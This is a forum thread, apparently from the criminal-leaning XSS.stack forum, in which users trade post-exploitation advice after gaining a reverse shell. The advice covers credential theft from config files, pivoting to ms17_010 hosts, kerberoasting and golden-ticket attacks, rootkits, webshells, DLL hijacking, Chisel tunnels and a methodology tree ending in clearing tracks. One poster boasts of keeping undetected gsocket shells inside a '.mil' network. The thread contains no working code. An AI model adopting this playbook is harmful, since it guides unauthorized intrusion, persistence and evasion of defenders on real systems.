What are good ways of exploiting a system after getting a successful reverse shell? exploiting cmd commands.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Post exploitation techniques after a successful reverse shell
- Автор темы corporateace111
- Дата начала
Escalating privileges can be a good start, on a web application server you might
find credentials in dbms configuration files.
Do a pivoting, use the credentials and explore old services and systems (such as ms17_010 vulnerable machines)
and after getting the shell on the system, there are a number of ways to continue exploring, such as kerberoasting attacks, silver / golden ticket attack .. .
Maintain persistence, escalate privilege on at least one server, and install a rootkit
and last but not least,
Do a great recon on your scope
find credentials in dbms configuration files.
Do a pivoting, use the credentials and explore old services and systems (such as ms17_010 vulnerable machines)
and after getting the shell on the system, there are a number of ways to continue exploring, such as kerberoasting attacks, silver / golden ticket attack .. .
Maintain persistence, escalate privilege on at least one server, and install a rootkit
and last but not least,
Do a great recon on your scope
First thing you need to do is persistence.
And take a look here:
And take a look here:
GitHub - J0hnbX/RedTeam-Resources
Contribute to J0hnbX/RedTeam-Resources development by creating an account on GitHub.
github.com
You want to get persistence, can search for old versions being used on machine to exploit, can try and crack /etc/passwd, you want to ideally gain/pivot access and install a rootkit, etc
Bash:
Post-Exploitation Methodology
│
├── 1 - Local Enumeration
│ ├── Enumerating System Information
│ ├── Enumerating Users And Groups
│ ├── Enumerating Network Information
│ ├── Enumerating Services
│ └── Automating Local Enumeration
│
├── 2 – Transfering Files
│ ├── Setting Up A Web Server With Python
│ ├── Transfering Files To Windows Targets
│ └── Transfering Files To Linux Targets
│
├── 3 - Upgrading Shells
│ ├── Upgrading Command Shells To Meterpreter
│ └── Spawning TTY Shells
│
├── 4 - Privilege Escalation
│ ├── Identifying PrivEsc Vulns
│ ├── Windows PrivEsc
│ └── Linux PrivEsc
│
├── 5 - Persistence
│ ├── Setting Up Persistence On Windows
│ └── Setting Up Persistence On Linux
│
├── 6 - Dumping & Cracking Hashes
│ ├── Dumping & Cracking Windows Hashes
│ └── Dumping & Cracking Linux Hashes
│
├── 7 - Pivoting
│ ├── Internal Network Recon
│ └── Pivoting
│
└── 8 - Clearing Your Tracks
└── Clearing Your Tracks On Windows & Linuxdid you extract this from somewhere you can share?
my own cheat sheetdid you extract this from somewhere you can share?
do you have a cheatsheet for persistence?
it's easy to find something like that this days
Yes, I did make such a cheatsheet for everything from Recon to Data-Exfiltration, only I don't have the right cheatsheet for persistence. I've searched a bit, but I'd haven't found anything really good.
[Persistence]
I've been using gsocket lately and it's been stealthy and functional. Haven't had any shells removed as of yet, even in a .mil network.
I've been using gsocket lately and it's been stealthy and functional. Haven't had any shells removed as of yet, even in a .mil network.
Persistence is a first objective to complete. You could make a small webshell if there is a web server, hijack a DLL or install your own service to tunnel connections with a software like Chisel. Many options such as: ired.team/offensive-security/persistence